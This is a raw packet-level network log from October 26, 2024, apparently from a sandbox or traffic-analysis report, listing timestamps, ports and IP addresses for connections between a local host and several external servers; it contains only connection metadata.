Oct 26, 2024 07:27:17.279140949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.279160976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.279179096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.279195070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.279247046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.279297113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.279473066 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:17.294018984 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:17.299019098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299042940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299057007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299065113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299122095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.299163103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.299200058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299210072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299217939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299251080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299253941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.299261093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299292088 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:17.299304008 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.299364090 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:17.299901009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299910069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299926043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299935102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.299958944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.299988031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.300954103 CEST	49984	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:17.306262970 CEST	80	49984	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:17.327471972 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:17.340542078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.340564966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.340583086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.340625048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.340650082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.395184040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.395200968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.395209074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.395216942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.395282984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.395390034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.395407915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.395442009 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.395471096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.416651011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416671991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416690111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416820049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.416831017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416870117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416888952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416893005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.416907072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416925907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.416933060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.416963100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.416984081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.417437077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.417450905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.417500019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.417581081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.417614937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.417637110 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.417654991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.417659044 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.417675018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.417710066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.457463026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.457480907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.457592010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.457904100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.457911015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.457922935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.457993984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.513079882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.513099909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.513123989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.513290882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.522929907 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:17.534267902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534286976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534306049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534347057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534347057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.534363031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.534384966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534400940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.534404993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534431934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.534451962 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.534518957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534537077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534554958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.534581900 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.534605980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.535517931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.535536051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.535581112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.535681963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.535723925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.535736084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.535764933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.535770893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.535804033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.535819054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.535852909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.536235094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.536247969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.536278963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.536288977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.561903000 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:17.567500114 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:17.567632914 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:17.573030949 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:17.575669050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.575711966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.575731993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.575751066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.575767994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.575823069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.575828075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.576647043 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.630711079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.630748987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.630764008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.630799055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.630886078 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.630918026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.651597023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651603937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651688099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.651701927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651760101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651856899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.651906013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.651940107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651946068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651957989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651962996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.651993036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.652026892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.652403116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652410984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652455091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.652489901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652656078 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.652776957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652784109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652790070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652795076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.652826071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.652857065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.670809984 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:17.676260948 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:17.676413059 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:17.676508904 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:17.681786060 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:17.683645964 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:17.689477921 CEST	40500	49983	213.230.124.7	192.168.2.7
Oct 26, 2024 07:27:17.692951918 CEST	49983	40500	192.168.2.7	213.230.124.7
Oct 26, 2024 07:27:17.693205118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693218946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693226099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693265915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.693288088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.693394899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693407059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693427086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693459034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.693469048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.693672895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693679094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693691015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.693726063 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.748070002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.748089075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.748106956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.748172045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.748209953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.769304037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769311905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769323111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769397020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.769517899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769524097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769531012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769562006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.769588947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769589901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.769594908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.769639969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.770266056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.770272017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.770284891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.770323992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.770344973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.770452023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.770458937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.770463943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.770510912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.810882092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.810902119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.810920954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.810987949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.811003923 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.811027050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811093092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811110020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811295033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.811342001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811363935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811382055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811402082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811427116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.811769962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811808109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.811865091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.865525961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.865581036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.865587950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.865628004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.865632057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.865675926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.865675926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.886948109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.886953115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.886964083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.886970043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887001991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887028933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.887051105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887058020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887078047 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.887094021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887100935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.887140036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.887545109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887551069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887562037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887603045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.887862921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887885094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887895107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.887937069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.928275108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928287029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928292990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928334951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.928366899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.928524017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928577900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928582907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928627014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.928759098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928792000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928797007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.928838015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.929091930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.929153919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.929158926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.929164886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.929205894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.969235897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.969253063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.969259024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.969333887 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.983091116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.983153105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.983158112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.983187914 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:17.983238935 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:17.983268976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.004648924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.004654884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.004722118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.004851103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.004911900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.004925966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.004956961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.004982948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.005001068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005012035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005017042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005059958 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.005060911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.005199909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005249023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005255938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005269051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.005304098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.045780897 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.045797110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.045825958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.045839071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.045878887 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.045908928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046099901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046142101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046145916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046153069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046200037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046365976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046384096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046411991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046437025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046483040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046519041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046539068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046566010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046688080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046736002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046772003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046783924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046789885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.046823978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.046840906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.047202110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.047256947 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.047270060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.048688889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.087416887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.087423086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.087435961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.087533951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.087583065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.087618113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.102056026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.102133989 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.102221012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.102226973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.102272034 CEST	49982	80	192.168.2.7	185.215.113.84
